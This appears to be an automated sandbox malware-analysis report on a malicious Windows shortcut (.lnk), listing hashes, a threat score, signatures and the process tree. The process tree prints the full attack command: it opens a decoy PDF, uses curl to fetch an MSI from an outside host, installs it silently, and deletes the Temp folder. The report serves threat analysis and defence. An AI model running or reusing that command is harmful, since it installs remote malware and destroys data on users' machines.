Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
31-12-2024 08:43
Static task
static1
Behavioral task
behavioral1
Sample
c156c24ba8bbf168969b9acfa760f49b.lnk
Resource
win7-20240903-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
c156c24ba8bbf168969b9acfa760f49b.lnk
Resource
win10v2004-20241007-en
windows10-2004-x64
23 signatures
150 seconds
General
-
Target
c156c24ba8bbf168969b9acfa760f49b.lnk
-
Size
3KB
-
MD5
c156c24ba8bbf168969b9acfa760f49b
-
SHA1
110d20232e070265c8b5ab808264c5e9613cede6
-
SHA256
4b4bb2f618431b740a075df0972cd029be2418c1f1870d411ef4cf1e8779c97e
-
SHA512
d2969b42c5a4e5e8ceff1d8961e75abd4b9172631765445ac61f87f20acffd55054b94f4d491e80c53c0423da26f72948672ba6b41d4e2793a8a9fd9899518c7
Score
7/10
Malware Config
Signatures
-
Deletes itself 1 IoCs
pid Process 2576 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1344 wrote to memory of 2576 1344 cmd.exe 29 PID 1344 wrote to memory of 2576 1344 cmd.exe 29 PID 1344 wrote to memory of 2576 1344 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\c156c24ba8bbf168969b9acfa760f49b.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start msedge https://unec.edu.az/application/uploads/2014/12/pdf-sample.pdf & curl -sLo C:\Users\Admin\AppData\Local\Temp\6ad5feeb-dcc3-4eef-baa3-4bcd42ce30b4.msi http://serverl.org/cords/install.msi & C:\Users\Admin\AppData\Local\Temp\6ad5feeb-dcc3-4eef-baa3-4bcd42ce30b4.msi /qn & del /q/f/s C:\Users\Admin\AppData\Local\Temp & exit2⤵
- Deletes itself
PID:2576
-